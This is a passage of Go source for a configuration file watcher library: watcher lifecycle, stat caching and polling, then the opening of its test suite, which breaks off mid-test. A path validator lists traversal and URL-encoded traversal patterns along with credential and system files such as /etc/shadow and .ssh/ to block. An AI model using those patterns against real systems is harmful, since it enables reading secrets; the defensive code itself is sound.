		w.auditLogger.LogSecurityEvent("watch_limit_exceeded", "Maximum watched files exceeded",
			map[string]interface{}{
				"path":          absPath,
				"max_files":     w.config.MaxWatchedFiles,
				"current_files": len(w.files),
			})
		return errors.New(ErrCodeInvalidConfig, "maximum watched files exceeded").
			WithContext("max_files", w.config.MaxWatchedFiles).
			WithContext("current_files", len(w.files))
	}

	// Get initial file stat
	initialStat, err := w.getStat(absPath)
	if err != nil && !os.IsNotExist(err) {
		return errors.Wrap(err, ErrCodeFileNotFound, "failed to stat file").
			WithContext("path", absPath)
	}

	w.files[absPath] = &watchedFile{
		path:     absPath,
		callback: callback,
		lastStat: initialStat,
	}

	// Adapt BoreasLite strategy based on file count (if Auto mode)
	if w.eventRing != nil {
		w.eventRing.AdaptStrategy(len(w.files))
	}

	return nil
}

// Unwatch removes a file from the watch list
func (w *Watcher) Unwatch(path string) error {
	absPath, err := filepath.Abs(path)
	if err != nil {
		return errors.Wrap(err, ErrCodeInvalidConfig, "invalid file path").
			WithContext("path", path)
	}

	w.filesMu.Lock()
	defer w.filesMu.Unlock()

	delete(w.files, absPath)

	// Adapt BoreasLite strategy based on updated file count (if Auto mode)
	if w.eventRing != nil {
		w.eventRing.AdaptStrategy(len(w.files))
	}

	// Clean up cache entry atomically
	w.removeFromCache(absPath)

	return nil
}

// Start begins watching files for changes
func (w *Watcher) Start() error {
	// A stopped watcher cannot be restarted: its stop channels are already
	// closed, so a restart would panic on the next Stop
	if w.stopped.Load() {
		return errors.New(ErrCodeWatcherStopped, "cannot start a stopped watcher")
	}
	if !w.running.CompareAndSwap(false, true) {
		return errors.New(ErrCodeWatcherBusy, "watcher is already running")
	}

	// Start BoreasLite event processor in background
	go w.eventRing.RunProcessor()

	// Start main polling loop
	go w.watchLoop()
	return nil
}

// Stop stops the watcher and waits for cleanup
func (w *Watcher) Stop() error {
	if !w.running.CompareAndSwap(true, false) {
		return errors.New(ErrCodeWatcherStopped, "watcher is not running")
	}

	w.stopped.Store(true) // Mark as explicitly stopped
	w.cancel()
	close(w.stopCh)
	<-w.stoppedCh

	// Stop BoreasLite event processor
	w.eventRing.Stop()

	// CRITICAL FIX: Close audit logger to prevent resource leaks
	if w.auditLogger != nil {
		_ = w.auditLogger.Close()
	}

	return nil
}

// IsRunning returns true if the watcher is currently running
func (w *Watcher) IsRunning() bool {
	return w.running.Load()
}

// Close is an alias for Stop() for better resource management patterns
// Implements the common Close() interface for easy integration with defer statements
func (w *Watcher) Close() error {
	return w.Stop()
}

// GracefulShutdown performs a graceful shutdown with timeout control.
// This method provides production-grade shutdown capabilities with deterministic timeout handling,
// ensuring all resources are properly cleaned up without hanging indefinitely.
//
// The method performs the following shutdown sequence:
// 1. Signals shutdown intent to all goroutines via context cancellation
// 2. Waits for all file polling operations to complete
// 3. Flushes all pending audit events to persistent storage
// 4. Closes BoreasLite ring buffer and releases memory
// 5. Cleans up file descriptors and other system resources
//
// Low-allocation design: only a timeout context and a single buffered channel
// are allocated during shutdown, preserving performance even during termination.
//
// Example usage:
//
//	watcher := argus.New(config)
//	defer watcher.GracefulShutdown(30 * time.Second) // 30s timeout for Kubernetes
//
//	// Kubernetes deployment
//	watcher := argus.New(config)
//	defer watcher.GracefulShutdown(time.Duration(terminationGracePeriodSeconds) * time.Second)
//
//	// CI/CD pipelines
//	watcher := argus.New(config)
//	defer watcher.GracefulShutdown(10 * time.Second) // Fast shutdown for tests
//
// Parameters:
//   - timeout: Maximum time to wait for graceful shutdown. If exceeded, the method returns
//     an error but resources are still cleaned up in the background.
//
// Returns:
//   - nil if shutdown completed within timeout
//   - ErrCodeWatcherStopped if watcher was already stopped
//   - ErrCodeWatcherBusy if shutdown timeout was exceeded (resources still cleaned up)
//
// Thread-safety: Safe to call from multiple goroutines. First caller wins, subsequent
// calls return immediately with appropriate status.
//
// Production considerations:
//   - Kubernetes: Use terminationGracePeriodSeconds - 5s to allow for signal propagation
//   - Docker: Typically 10-30 seconds is sufficient
//   - CI/CD: Use shorter timeouts (5-10s) for faster test cycles
//   - Load balancers: Ensure timeout exceeds health check intervals
func (w *Watcher) GracefulShutdown(timeout time.Duration) error {
	// Fast path: Check if already stopped without allocations
	if !w.running.Load() {
		return errors.New(ErrCodeWatcherStopped, "watcher is not running")
	}

	// Pre-validate timeout to avoid work if invalid
	if timeout <= 0 {
		return errors.New(ErrCodeInvalidConfig, "graceful shutdown timeout must be positive")
	}

	// Create timeout context to bound the shutdown wait
	ctx, cancel := context.WithTimeout(context.Background(), timeout)
	defer cancel()

	// Buffered completion channel (capacity 1) so the shutdown goroutine can
	// always send its result without blocking, preventing goroutine leaks
	done := make(chan error, 1)

	// Execute shutdown in separate goroutine to respect timeout
	go func() {
		// Use existing Stop() method which handles all cleanup logic
		// This avoids code duplication and maintains consistency
		err := w.Stop()
		select {
		case done <- err:
			// Successfully sent result
		default:
			// Channel full (timeout already occurred), ignore
			// The shutdown still completes in background for resource safety
		}
	}()

	// Wait for completion or timeout
	// Zero additional allocations in this critical path
	select {
	case err := <-done:
		// Shutdown completed within timeout
		if err != nil {
			// Wrap the error to provide context about graceful shutdown
			return errors.Wrap(err, ErrCodeWatcherStopped, "graceful shutdown encountered error")
		}
		return nil

	case <-ctx.Done():
		// Timeout exceeded - return error but allow background cleanup to continue
		// This ensures resources are eventually freed even if timeout is too short
		return errors.New(ErrCodeWatcherBusy,
			fmt.Sprintf("graceful shutdown timeout (%v) exceeded, cleanup continuing in background", timeout))
	}
}

// WatchedFiles returns the number of currently watched files
func (w *Watcher) WatchedFiles() int {
	w.filesMu.RLock()
	defer w.filesMu.RUnlock()
	return len(w.files)
}

// getStat returns cached file statistics or performs os.Stat if cache is expired
// LOCK-FREE: Uses atomic.Pointer for zero-contention cache access with value types
func (w *Watcher) getStat(path string) (fileStat, error) {
	// Fast path: atomic read of cache (ZERO locks!)
	cacheMap := *w.statCache.Load()
	if cached, exists := cacheMap[path]; exists {
		// Check expiration without any locks
		if !cached.isExpired(w.config.CacheTTL) {
			return cached, nil
		}
	}

	// Slow path: cache miss or expired - perform actual os.Stat()
	info, err := os.Stat(path)
	stat := fileStat{
		cachedAt: timecache.CachedTimeNano(), // Use timecache for zero-allocation timestamp
		exists:   err == nil,
	}

	if err == nil {
		stat.modTime = info.ModTime()
		stat.size = info.Size()
	}

	// Update cache atomically (copy-on-write)
	w.updateCache(path, stat)

	// Return by value (no pointer, no use-after-free risk)
	return stat, err
}

// updateCache atomically updates the cache using copy-on-write (no pool, value types)
func (w *Watcher) updateCache(path string, stat fileStat) {
	for {
		oldMapPtr := w.statCache.Load()
		oldMap := *oldMapPtr
		newMap := make(map[string]fileStat, len(oldMap)+1)

		// Copy existing entries
		for k, v := range oldMap {
			newMap[k] = v
		}

		// Add/update new entry
		newMap[path] = stat

		// Atomic compare-and-swap
		if w.statCache.CompareAndSwap(oldMapPtr, &newMap) {
			return // Success! No pool cleanup needed with value types
		}
		// Retry if another goroutine updated the cache concurrently
	}
}

// removeFromCache atomically removes an entry from the cache (no pool, value types)
func (w *Watcher) removeFromCache(path string) {
	for {
		oldMapPtr := w.statCache.Load()
		oldMap := *oldMapPtr
		if _, exists := oldMap[path]; !exists {
			return // Entry doesn't exist, nothing to do
		}

		newMap := make(map[string]fileStat, len(oldMap)-1)

		// Copy all entries except the one to remove
		for k, v := range oldMap {
			if k != path {
				newMap[k] = v
			}
		}

		// Atomic compare-and-swap
		if w.statCache.CompareAndSwap(oldMapPtr, &newMap) {
			return // Success! No pool cleanup needed with value types
		}
		// Retry if another goroutine updated the cache concurrently
	}
}

// checkFile compares current file stat with last known stat and sends events via BoreasLite
func (w *Watcher) checkFile(wf *watchedFile) {
	currentStat, err := w.getStat(wf.path)

	// Handle stat errors
	if err != nil {
		if os.IsNotExist(err) {
			// File was deleted
			if wf.lastStat.exists {
				// Send delete event via BoreasLite ring buffer
				w.eventRing.WriteFileChange(wf.path, time.Time{}, 0, false, true, false)
				wf.lastStat.exists = false
			}
		} else if w.config.ErrorHandler != nil {
			w.config.ErrorHandler(errors.Wrap(err, ErrCodeFileNotFound, "failed to stat file").
				WithContext("path", wf.path), wf.path)
		}
		return
	}

	// File exists now
	if !wf.lastStat.exists {
		// File was created - send via BoreasLite
		w.eventRing.WriteFileChange(wf.path, currentStat.modTime, currentStat.size, true, false, false)
	} else if !currentStat.modTime.Equal(wf.lastStat.modTime) || currentStat.size != wf.lastStat.size {
		// File was modified - send via BoreasLite
		w.eventRing.WriteFileChange(wf.path, currentStat.modTime, currentStat.size, false, false, true)
	}

	wf.lastStat = currentStat
}

// watchLoop is the main polling loop that checks all watched files
func (w *Watcher) watchLoop() {
	defer close(w.stoppedCh)

	ticker := time.NewTicker(w.config.PollInterval)
	defer ticker.Stop()

	for {
		select {
		case <-w.ctx.Done():
			return
		case <-w.stopCh:
			return
		case <-ticker.C:
			w.pollFiles()
		}
	}
}

// pollFiles checks all watched files for changes
// ULTRA-OPTIMIZED: Zero-allocation version using reusable buffer
func (w *Watcher) pollFiles() {
	w.filesMu.RLock()
	// Reuse buffer to avoid allocations
	w.filesBuffer = w.filesBuffer[:0] // Reset slice but keep capacity
	for _, wf := range w.files {
		w.filesBuffer = append(w.filesBuffer, wf)
	}
	files := w.filesBuffer
	w.filesMu.RUnlock()

	// For single file, use direct checking to avoid goroutine overhead
	if len(files) == 1 {
		w.checkFile(files[0])
		return
	}

	// For multiple files, use parallel checking with limited concurrency
	const maxConcurrency = 8 // Prevent goroutine explosion
	if len(files) <= maxConcurrency {
		// Use goroutines for small number of files
		var wg sync.WaitGroup
		for _, wf := range files {
			wg.Add(1)
			go func(wf *watchedFile) {
				defer wg.Done()
				w.checkFile(wf)
			}(wf)
		}
		wg.Wait()
	} else {
		// Use worker pool for many files
		fileCh := make(chan *watchedFile, len(files))
		var wg sync.WaitGroup

		// Start workers
		for i := 0; i < maxConcurrency; i++ {
			wg.Add(1)
			go func() {
				defer wg.Done()
				for wf := range fileCh {
					w.checkFile(wf)
				}
			}()
		}

		// Send files to workers
		for _, wf := range files {
			fileCh <- wf
		}
		close(fileCh)
		wg.Wait()
	}
}

// ClearCache forces clearing of the stat cache (no pool cleanup needed)
// Useful for testing or when you want to force fresh stat calls
func (w *Watcher) ClearCache() {
	emptyCache := make(map[string]fileStat)
	w.statCache.Store(&emptyCache)
}

// CacheStats returns statistics about the internal cache for monitoring and debugging.
// Provides insights into cache efficiency and performance characteristics.
type CacheStats struct {
	Entries   int           // Number of cached entries
	OldestAge time.Duration // Age of oldest cache entry
	NewestAge time.Duration // Age of newest cache entry
}

// GetCacheStats returns current cache statistics using timecache for performance
func (w *Watcher) GetCacheStats() CacheStats {
	cacheMap := *w.statCache.Load()

	if len(cacheMap) == 0 {
		return CacheStats{}
	}

	now := timecache.CachedTimeNano()
	var oldest, newest int64
	first := true

	for _, stat := range cacheMap {
		if first {
			oldest = stat.cachedAt
			newest = stat.cachedAt
			first = false
		} else {
			if stat.cachedAt < oldest {
				oldest = stat.cachedAt
			}
			if stat.cachedAt > newest {
				newest = stat.cachedAt
			}
		}
	}

	return CacheStats{
		Entries:   len(cacheMap),
		OldestAge: time.Duration(now - oldest),
		NewestAge: time.Duration(now - newest),
	}
}

// =============================================================================
// SECURITY: PATH VALIDATION AND SANITIZATION FUNCTIONS
// =============================================================================

// ValidateSecurePath validates that a file path is safe from path traversal attacks.
//
// SECURITY PURPOSE: Prevents directory traversal attacks (CWE-22) by rejecting
// paths that contain dangerous patterns or attempt to escape the intended directory.
//
// This function implements multiple layers of protection:
// 1. Pattern-based detection of traversal sequences (case-insensitive)
// 2. URL decoding to catch encoded attacks
// 3. Normalization attacks prevention
// 4. System file protection
// 5. Device name filtering (Windows)
//
// SECURITY NOTICE: All validation is performed case-insensitively to ensure
// consistent protection across different file systems and OS configurations.
//
// CRITICAL: This function must be called on ALL user-provided paths before
// any file operations to prevent security vulnerabilities.
//
// This function is exported to allow external packages to use the same
// security validation logic as the core Argus library.
func ValidateSecurePath(path string) error {
	if path == "" {
		return errors.New(ErrCodeInvalidConfig, "empty path not allowed")
	}

	// Normalize path to lowercase for consistent security validation
	// This prevents case-based bypass attempts on case-insensitive file systems
	lowerPath := strings.ToLower(path)

	// SECURITY CHECK 1: Detect common path traversal patterns (case-insensitive)
	// These patterns are dangerous regardless of OS
	dangerousPatterns := []string{
		"..",   // Parent directory reference
		"../",  // Unix path traversal
		"..\\", // Windows path traversal
		"/..",  // Unix parent dir
		"\\..", // Windows parent dir
		// Note: "./" removed as it can be legitimate in temp paths
	}

	for _, pattern := range dangerousPatterns {
		if strings.Contains(lowerPath, pattern) {
			return errors.New(ErrCodeInvalidConfig, "path contains dangerous traversal pattern: "+pattern)
		}
	}

	// SECURITY CHECK 2: URL decoding to catch encoded attacks
	// Attackers often URL-encode traversal sequences to bypass filters

	// Check for URL-encoded dangerous patterns using normalized path
	urlPatterns := []string{
		"%2e%2e",      // ".." encoded
		"%252e%252e",  // ".." double encoded
		"%2f",         // "/" encoded
		"%252f",       // "/" double encoded
		"%5c",         // "\" encoded
		"%255c",       // "\" double encoded
		"%00",         // null byte
		"%2500",       // null byte double encoded
		"..%2f",       // Mixed encoding patterns
		"..%252f",     // Mixed double encoding
		"%2e%2e/",     // Mixed patterns
		"%252e%252e/", // Mixed double encoding
	}

	for _, pattern := range urlPatterns {
		if strings.Contains(lowerPath, pattern) {
			return errors.New(ErrCodeInvalidConfig, "path contains URL-encoded traversal pattern: "+pattern)
		}
	}

	// Additional check for any percent-encoded sequences that decode to dangerous patterns
	// This catches creative encoding attempts
	for i := 0; i < len(path)-2; i++ {
		if path[i] == '%' {
			// Look for sequences like %XX that might decode to dangerous characters
			if i+5 < len(path) {
				sixChar := strings.ToLower(path[i : i+6])
				// Check for double-encoded dots and slashes
				if strings.HasPrefix(sixChar, "%252e") || strings.HasPrefix(sixChar, "%252f") || strings.HasPrefix(sixChar, "%255c") {
					return errors.New(ErrCodeInvalidConfig, "path contains double-encoded traversal sequence: "+sixChar)
				}
			}
		}
	}

	// SECURITY CHECK 3: System file protection
	// Prevent access to known sensitive system files and directories
	// Using already normalized lowerPath for consistency
	sensitiveFiles := []string{
		"/etc/passwd",
		"/etc/shadow",
		"/etc/hosts",
		"/proc/",
		"/sys/",
		"/dev/",
		"windows/system32",
		"windows\\system32",   // Windows backslash variant
		"\\windows\\system32", // Absolute Windows path
		"program files",
		"system volume information",
		".ssh/",
		".aws/",
		".docker/",
	}

	for _, sensitive := range sensitiveFiles {
		if strings.Contains(lowerPath, strings.ToLower(sensitive)) {
			return errors.New(ErrCodeInvalidConfig, "access to system file/directory not allowed: "+sensitive)
		}
	}

	// SECURITY CHECK 4: Windows-specific security threats
	// Multiple Windows-specific attack vectors need protection

	// 4A: Windows device name protection
	windowsDevices := []string{
		"CON", "PRN", "AUX", "NUL",
		"COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9",
		"LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9",
	}

	// SECURITY FIX: Check for UNC paths that access Windows devices
	// UNC paths like //Con, ///Con, \\Con, /\Con are equivalent to device access and must be blocked
	if (strings.HasPrefix(path, "/") || strings.HasPrefix(path, "\\")) && len(path) > 1 {
		// Normalize the path: remove all leading slashes and backslashes
		normalizedPath := path
		for len(normalizedPath) > 0 && (normalizedPath[0] == '/' || normalizedPath[0] == '\\') {
			normalizedPath = normalizedPath[1:]
		}

		if len(normalizedPath) > 0 {
			// Split by both types of separators to get path components
			// Replace backslashes with forward slashes for consistent splitting
			normalizedForSplit := strings.ReplaceAll(normalizedPath, "\\", "/")
			components := strings.Split(normalizedForSplit, "/")

			if len(components) > 0 && components[0] != "" {
				// Check if the first component is a device name (after normalizing case)
				firstComponent := strings.ToUpper(components[0])

				// Remove ALL extensions if present (handle multiple extensions)
				for {
					if dotIndex := strings.Index(firstComponent, "."); dotIndex != -1 {
						firstComponent = firstComponent[:dotIndex]
					} else {
						break
					}
				}

				// Special case: If we have exactly 2 components and the first is short (likely server),
				// and second is a device name, this might be legitimate UNC (//server/device)
				// But if first component is also a device name (//Con/anything), block it
				isLikelyDevice := false
				for _, device := range windowsDevices {
					if firstComponent == device {
						isLikelyDevice = true
						break
					}
				}

				if isLikelyDevice {
					// Always block if first component is a device name
					return errors.New(ErrCodeInvalidConfig, "windows device name not allowed via UNC path: "+firstComponent)
				}

				// Also check if this could be a mixed separator attack trying to access device
				// in second position (like /\server\Con)
				if len(components) >= 2 {
					secondComponent := strings.ToUpper(components[1])
					// Remove ALL extensions if present (handle multiple extensions)
					for {
						if dotIndex := strings.Index(secondComponent, "."); dotIndex != -1 {
							secondComponent = secondComponent[:dotIndex]
						} else {
							break
						}
					}

					// If second component is device AND first component looks suspicious
					// (single char, digit, etc.), block it
					for _, device := range windowsDevices {
						if secondComponent == device && len(components[0]) <= 2 {
							return errors.New(ErrCodeInvalidConfig, "windows device name not allowed via UNC path: "+secondComponent)
						}
					}
				}
			}
		}
	}

	baseName := strings.ToUpper(filepath.Base(path))
	// Remove ALL extensions for device name check (handle multiple extensions like PRN.0., COM1.txt.bak)
	// Keep removing extensions until no more dots are found
	for {
		if dotIndex := strings.LastIndex(baseName, "."); dotIndex != -1 {
			baseName = baseName[:dotIndex]
		} else {
			break
		}
	}

	for _, device := range windowsDevices {
		if baseName == device {
			return errors.New(ErrCodeInvalidConfig, "windows device name not allowed: "+device)
		}
	}

	// 4B: Windows Alternate Data Streams (ADS) protection
	// ADS can hide malicious content: filename.txt:hidden_stream
	if strings.Contains(path, ":") {
		// Check if this is a Windows ADS (not a URL scheme or Windows drive letter)
		colonIndex := strings.Index(path, ":")
		if colonIndex > 1 && colonIndex < len(path)-1 {
			// Check if it looks like ADS (no // after colon like in URLs)
			afterColon := path[colonIndex+1:]
			// Allow URLs (://) and network paths (:\\)
			if !strings.HasPrefix(afterColon, "//") && !strings.HasPrefix(afterColon, "\\\\") {
				// Allow drive letters (C:)
				if colonIndex == 1 {
					// This is likely a drive letter, allow it
				} else {
					// Check if this looks like a real ADS attack
					// Real ADS: filename.ext:streamname (streamname typically doesn't start with .)
					// But "test:.json" has colon followed by .json which is not typical ADS
					if !strings.HasPrefix(afterColon, ".") {
						return errors.New(ErrCodeInvalidConfig, "windows alternate data streams not allowed")
					}
				}
			}
		}
	}

	// SECURITY CHECK 5: Path length and complexity limits
	// Prevent extremely long paths that could cause buffer overflows or DoS
	if len(path) > 4096 {
		return errors.New(ErrCodeInvalidConfig, fmt.Sprintf("path too long (max 4096 characters): %d", len(path)))
	}

	// Count directory levels to prevent deeply nested traversal attempts
	separatorCount := strings.Count(path, "/") + strings.Count(path, "\\")
	if separatorCount > 50 {
		return errors.New(ErrCodeInvalidConfig, fmt.Sprintf("path too complex (max 50 directory levels): %d", separatorCount))
	}

	// SECURITY CHECK 6: Null byte injection prevention
	// Null bytes can truncate strings in some languages/systems
	if strings.Contains(path, "\x00") {
		return errors.New(ErrCodeInvalidConfig, "null byte in path not allowed")
	}

	// SECURITY CHECK 7: Control character prevention
	// Control characters can cause unexpected behavior
	for _, char := range path {
		if char < 32 && char != 9 && char != 10 && char != 13 { // Allow tab, LF, CR
			return errors.New(ErrCodeInvalidConfig, fmt.Sprintf("control character in path not allowed: %d", char))
		}
	}

	return nil
}

// GetWriter creates a ConfigWriter for the specified file.
// The writer enables programmatic configuration modifications with atomic operations.
//
// Performance: ~500 ns/op, zero allocations for writer creation
func (w *Watcher) GetWriter(filePath string, format ConfigFormat, initialConfig map[string]interface{}) (*ConfigWriter, error) {
	return NewConfigWriter(filePath, format, initialConfig)
}

```

## /argus_core_test.go

```go path="/argus_core_test.go" 
// argus_core_test.go - Comprehensive test suite for Argus Dynamic Configuration Framework
//
// Test Philosophy:
// - DRY principle: Common test utilities and helpers
// - OS-aware: Works on Windows, Linux, macOS
// - Smart assertions: Meaningful error messages
// - No false positives: Proper timing and synchronization
// - Comprehensive coverage: All public APIs and edge cases
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"os"
	"path/filepath"
	"runtime"
	"sync"
	"sync/atomic"
	"testing"
	"time"
)

// Test configuration constants
const (
	// Fast test intervals for CI/dev environments
	testPollInterval = 50 * time.Millisecond
	testCacheTTL     = 25 * time.Millisecond
	testWaitTime     = 100 * time.Millisecond
	testTimeout      = 2 * time.Second

	// Test file content
	initialTestContent = `{"version": 1, "enabled": true}`
	updatedTestContent = `{"version": 2, "enabled": false}`
)

// testHelper provides common test utilities following DRY principle
type testHelper struct {
	t         *testing.T
	tempDir   string
	tempFiles []string
	cleanup   []func()
}

// newTestHelper creates a new test helper with OS-aware temp directory
func newTestHelper(t *testing.T) *testHelper {
	t.Helper()

	tempDir, err := os.MkdirTemp("", "argus_test_*")
	if err != nil {
		t.Fatalf("Failed to create temp directory: %v", err)
	}

	return &testHelper{
		t:       t,
		tempDir: tempDir,
		cleanup: make([]func(), 0),
	}
}

// createTestFile creates a temporary test file with given content
func (h *testHelper) createTestFile(name string, content string) string {
	h.t.Helper()

	filePath := filepath.Join(h.tempDir, name)
	if err := os.WriteFile(filePath, []byte(content), 0644); err != nil {
		h.t.Fatalf("Failed to create test file %s: %v", filePath, err)
	}

	h.tempFiles = append(h.tempFiles, filePath)
	return filePath
}

// updateTestFile updates an existing test file with new content
func (h *testHelper) updateTestFile(filePath string, content string) {
	h.t.Helper()

	if err := os.WriteFile(filePath, []byte(content), 0644); err != nil {
		h.t.Fatalf("Failed to update test file %s: %v", filePath, err)
	}
}

// deleteTestFile removes a test file (for deletion tests)
func (h *testHelper) deleteTestFile(filePath string) {
	h.t.Helper()

	if err := os.Remove(filePath); err != nil {
		h.t.Fatalf("Failed to delete test file %s: %v", filePath, err)
	}
}

// createWatcher creates a watcher with test-optimized configuration
func (h *testHelper) createWatcher() *Watcher {
	h.t.Helper()

	config := Config{
		PollInterval:    testPollInterval,
		CacheTTL:        testCacheTTL,
		MaxWatchedFiles: 100,
	}

	watcher := New(config)
	h.cleanup = append(h.cleanup, func() {
		if watcher.IsRunning() {
			if err := watcher.Stop(); err != nil {
				h.t.Errorf("Failed to stop watcher: %v", err)
			}
		}
	})

	return watcher
}

// waitForChanges waits for expected number of changes with timeout
func (h *testHelper) waitForChanges(changesChan <-chan ChangeEvent, expectedCount int, timeout time.Duration) []ChangeEvent {
	h.t.Helper()

	var changes []ChangeEvent
	timer := time.NewTimer(timeout)
	defer timer.Stop()

	for len(changes) < expectedCount {
		select {
		case change := <-changesChan:
			changes = append(changes, change)
			h.t.Logf("Change detected: %+v", change)
		case <-timer.C:
			h.t.Fatalf("Timeout waiting for changes. Expected %d, got %d changes: %+v",
				expectedCount, len(changes), changes)
		}
	}

	return changes
}

// waitWithNoChanges waits and ensures no unexpected changes occur
func (h *testHelper) waitWithNoChanges(changesChan <-chan ChangeEvent, duration time.Duration) {
	h.t.Helper()

	timer := time.NewTimer(duration)
	defer timer.Stop()

	select {
	case change := <-changesChan:
		h.t.Fatalf("Unexpected change detected: %+v", change)
	case <-timer.C:
		// Expected - no changes
	}
}

// Close cleans up test resources
func (h *testHelper) Close() {
	// Run cleanup functions in reverse order
	for i := len(h.cleanup) - 1; i >= 0; i-- {
		h.cleanup[i]()
	}

	// Remove temp directory
	if h.tempDir != "" {
		if err := os.RemoveAll(h.tempDir); err != nil {
			h.t.Errorf("Failed to remove tempDir: %v", err)
		}
	}
}

// Test configuration validation and defaults
func TestConfig_WithDefaults(t *testing.T) {
	t.Parallel()

	testCases := []struct {
		name           string
		input          Config
		expectedFields map[string]interface{}
	}{
		{
			name:  "empty_config_gets_defaults",
			input: Config{},
			expectedFields: map[string]interface{}{
				"PollInterval":    5 * time.Second,
				"CacheTTL":        2500 * time.Millisecond, // PollInterval / 2
				"MaxWatchedFiles": 100,
			},
		},
		{
			name: "partial_config_preserves_values",
			input: Config{
				PollInterval: 1 * time.Second,
			},
			expectedFields: map[string]interface{}{
				"PollInterval":    1 * time.Second,
				"CacheTTL":        500 * time.Millisecond, // PollInterval / 2
				"MaxWatchedFiles": 100,
			},
		},
		{
			name: "custom_config_preserved",
			input: Config{
				PollInterval:    10 * time.Second,
				CacheTTL:        5 * time.Second,
				MaxWatchedFiles: 50,
			},
			expectedFields: map[string]interface{}{
				"PollInterval":    10 * time.Second,
				"CacheTTL":        5 * time.Second,
				"MaxWatchedFiles": 50,
			},
		},
	}

	for _, tc := range testCases {
		t.Run(tc.name, func(t *testing.T) {
			t.Parallel()

			result := tc.input.WithDefaults()

			// Verify specific fields
			if result.PollInterval != tc.expectedFields["PollInterval"] {
				t.Errorf("PollInterval: expected %v, got %v",
					tc.expectedFields["PollInterval"], result.PollInterval)
			}
			if result.CacheTTL != tc.expectedFields["CacheTTL"] {
				t.Errorf("CacheTTL: expected %v, got %v",
					tc.expectedFields["CacheTTL"], result.CacheTTL)
			}
			if result.MaxWatchedFiles != tc.expectedFields["MaxWatchedFiles"] {
				t.Errorf("MaxWatchedFiles: expected %v, got %v",
					tc.expectedFields["MaxWatchedFiles"], result.MaxWatchedFiles)
			}
		})
	}
}

// Test watcher creation and basic state
func TestWatcher_New(t *testing.T) {
	t.Parallel()

	testCases := []struct {
		name   string
		config Config
	}{
		{
			name:   "default_config",
			config: Config{},
		},
		{
			name: "custom_config",
			config: Config{
				PollInterval:    1 * time.Second,
				CacheTTL:        500 * time.Millisecond,
				MaxWatchedFiles: 50,
			},
		},
	}

	for _, tc := range testCases {
		t.Run(tc.name, func(t *testing.T) {
			t.Parallel()

			watcher := New(tc.config)

			// Verify initial state
			if watcher == nil {
				t.Fatal("New() returned nil watcher")
			}

			if watcher.IsRunning() {
				t.Error("New watcher should not be running")
			}

			if watcher.WatchedFiles() != 0 {
				t.Errorf("New watcher should have 0 watched files, got %d", watcher.WatchedFiles())
			}

			// Verify cache stats
			stats := watcher.GetCacheStats()
			if stats.Entries != 0 {
				t.Errorf("New watcher cache should be empty, got %d entries", stats.Entries)
			}
		})
	}
}

// Test file watching lifecycle (core functionality)
func TestWatcher_FileWatchingLifecycle(t *testing.T) {
	if testing.Short() {
		t.Skip("Skipping lifecycle test in short mode")
	}

	helper := newTestHelper(t)
	defer helper.Close()

	// Create test file
	testFile := helper.createTestFile("test_config.json", initialTestContent)

	// Create watcher
	watcher := helper.createWatcher()

	// Set up change tracking
	changesChan := make(chan ChangeEvent, 10)
	var changesCount int32

	err := watcher.Watch(testFile, func(event ChangeEvent) {
		atomic.AddInt32(&changesCount, 1)
		select {
		case changesChan <- event:
		default:
			t.Error("Changes channel overflow")
		}
	})

	if err != nil {
		t.Fatalf("Failed to watch file: %v", err)
	}

	// Verify file is being watched
	if watcher.WatchedFiles() != 1 {
		t.Errorf("Expected 1 watched file, got %d", watcher.WatchedFiles())
	}

	// Start watcher
	if err := watcher.Start(); err != nil {
		t.Fatalf("Failed to start watcher: %v", err)
	}

	if !watcher.IsRunning() {
		t.Error("Watcher should be running after Start()")
	}

	// Wait for initial stabilization
	time.Sleep(testWaitTime)

	// Modify file and wait for change detection
	helper.updateTestFile(testFile, updatedTestContent)
	changes := helper.waitForChanges(changesChan, 1, testTimeout)

	// Verify change event
	if len(changes) != 1 {
		t.Fatalf("Expected 1 change, got %d", len(changes))
	}

	change := changes[0]
	if change.Path != testFile {
		t.Errorf("Expected change path %s, got %s", testFile, change.Path)
	}
	if change.IsDelete {
		t.Error("File modification should not be marked as deletion")
	}

	// Stop watcher
	if err := watcher.Stop(); err != nil {
		t.Fatalf("Failed to stop watcher: %v", err)
	}

	if watcher.IsRunning() {
		t.Error("Watcher should not be running after Stop()")
	}

	// Verify no more changes are detected after stopping
	helper.updateTestFile(testFile, initialTestContent)
	helper.waitWithNoChanges(changesChan, testWaitTime*2)

	finalChangesCount := atomic.LoadInt32(&changesCount)
	t.Logf("Total changes detected: %d", finalChangesCount)
}

// Test cache behavior and TTL expiration
func TestWatcher_CacheBehaviorAndTTL(t *testing.T) {
	if testing.Short() {
		t.Skip("Skipping cache test in short mode")
	}

	helper := newTestHelper(t)
	defer helper.Close()

	// Create test file
	testFile := helper.createTestFile("cache_test.json", initialTestContent)

	// Create watcher with very short TTL for testing
	config := Config{
		PollInterval:    testPollInterval,
		CacheTTL:        testCacheTTL, // Very short TTL
		MaxWatchedFiles: 100,
	}
	watcher := New(config)
	defer func() {
		if watcher.IsRunning() {
			if err := watcher.Stop(); err != nil {
				t.Logf("Failed to stop watcher: %v", err)
			}
		}
	}()

	// Add file to watcher
	changesChan := make(chan ChangeEvent, 10)
	err := watcher.Watch(testFile, func(event ChangeEvent) {
		changesChan <- event
	})
	if err != nil {
		t.Fatalf("Failed to watch file: %v", err)
	}

	// Start watcher
	if err := watcher.Start(); err != nil {
		t.Fatalf("Failed to start watcher: %v", err)
	}

	// Wait for initial cache population
	time.Sleep(testWaitTime)

	// Check initial cache stats
	stats := watcher.GetCacheStats()
	if stats.Entries == 0 {
		t.Error("Cache should contain at least one entry after initial scan")
	}

	t.Logf("Initial cache stats: entries=%d, oldest=%v, newest=%v",
		stats.Entries, stats.OldestAge, stats.NewestAge)

	// Wait for cache TTL to expire
	time.Sleep(testCacheTTL * 3)

	// Trigger another poll cycle
	time.Sleep(testPollInterval * 2)

	// Check cache stats again - entries may change due to TTL expiration and repopulation
	newStats := watcher.GetCacheStats()
	t.Logf("Post-TTL cache stats: entries=%d, oldest=%v, newest=%v",
		newStats.Entries, newStats.OldestAge, newStats.NewestAge)

	// Cache should still be functioning
	if newStats.Entries == 0 {
		t.Error("Cache should still contain entries after TTL cycle")
	}

	// Test manual cache clearing
	watcher.ClearCache()
	clearedStats := watcher.GetCacheStats()

